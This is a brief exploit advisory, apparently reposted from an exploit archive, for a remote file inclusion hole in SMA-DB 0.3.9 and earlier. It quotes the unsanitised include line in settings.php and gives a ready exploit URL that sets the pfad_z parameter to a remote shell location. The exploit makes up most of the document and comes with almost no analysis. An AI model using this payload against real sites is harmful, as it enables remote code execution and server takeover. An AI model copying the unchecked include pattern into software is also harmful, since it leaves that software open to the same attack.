id: 1478
date: 02/05/2007
title: SMA-DB <= 0.3.9 (settings.php) Remote File Inclusion Vulnerability
author: ThE dE@Th
cves: 

==================================================================
SMA-DB <= 0.3.9 (settings.php) Remote File Inclusion Vulnerability
==================================================================



********************************************************************************
Discovered By:- ThE dE@Th <<{AsB-MaY DiScOvEr ExPlIoTs Gr0uP}>>
******************************************************************************
Settings.php:-
include_once($pfad_z."scripts/session.php");
********************************************************************************
ExPlOiT:-http://www.Site.com/theme/settings.php?pfad_z=[Shell]
********************************************************************************




#  0day.today [2023-03-25]  #